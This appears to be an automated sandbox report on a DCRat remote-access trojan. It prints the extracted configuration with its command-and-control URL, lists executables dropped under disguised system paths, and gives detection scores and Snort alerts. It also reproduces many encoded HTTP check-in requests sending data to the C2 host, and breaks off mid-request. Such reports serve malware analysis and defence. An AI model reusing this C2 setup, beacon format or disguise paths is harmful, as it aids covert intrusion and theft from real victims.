            Source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"E\":\"~\",\"J\":\"@\",\"h\":\"%\",\"j\":\"#\",\"1\":\"(\",\"l\":\"&\",\"S\":\"$\",\"3\":\"!\",\"M\":\"<\",\"8\":\";\",\"o\":\"-\",\"c\":\")\",\"Z\":\"`\",\"4\":\"_\",\"y\":\"^\",\"5\":\"*\",\"d\":\">\",\"6\":\"|\",\"B\":\".\",\"H\":\",\",\"p\":\" \"}", "PCRT": "{\"B\":\" \",\"V\":\"|\",\"F\":\")\",\"Q\":\"<\",\"l\":\"`\",\"M\":\"!\",\"W\":\">\",\"k\":\";\",\"c\":\"-\",\"w\":\"@\",\"S\":\"%\",\"U\":\"^\",\"d\":\"_\",\"m\":\"$\",\"D\":\"*\",\"X\":\"&\",\"R\":\".\",\"v\":\"#\",\"j\":\"(\",\"N\":\"~\",\"K\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-84cmi9yxIS6Lop3CzZmk", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "H2": "http://a0985701.xsph.ru/@=AzYyIGNycDO", "T": "0"}
            Source: a0985701.xsph.ruVirustotal: Detection: 10%Perma Link
            Source: http://a0985701.xsph.ru/Virustotal: Detection: 10%Perma Link
            Source: http://a0985701.xsph.ruVirustotal: Detection: 10%Perma Link
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exeReversingLabs: Detection: 87%
            Source: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Windows\addins\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: C:\Windows\addins\RuntimeBroker.exeVirustotal: Detection: 67%Perma Link
            Source: C:\bridgeportserver\blockServerruntime.exeReversingLabs: Detection: 87%
            Source: C:\bridgeportserver\blockServerruntime.exeVirustotal: Detection: 67%Perma Link
            Source: N0tepkRPzw.exeReversingLabs: Detection: 68%
            Source: N0tepkRPzw.exeVirustotal: Detection: 58%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\bridgeportserver\blockServerruntime.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJoe Sandbox ML: detected
            Source: C:\Windows\addins\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: N0tepkRPzw.exeJoe Sandbox ML: detected
            Source: N0tepkRPzw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\bridgeportserver\blockServerruntime.exeDirectory created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeDirectory created: C:\Program Files\7-Zip\Lang\c4950d50751633Jump to behavior
            Source: N0tepkRPzw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: N0tepkRPzw.exe
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D5A5F4
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D6B8E0

            Networking

            barindex
            Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.26:80 -> 192.168.2.4:49730
            Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.26:80 -> 192.168.2.4:49749
            Source: Malware configuration extractorURLs: http://a0985701.xsph.ru/@=AzYyIGNycDO
            Source: Joe Sandbox ViewIP Address: 141.8.192.26 141.8.192.26
            Source: Joe Sandbox ViewIP Address: 141.8.192.26 141.8.192.26
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpV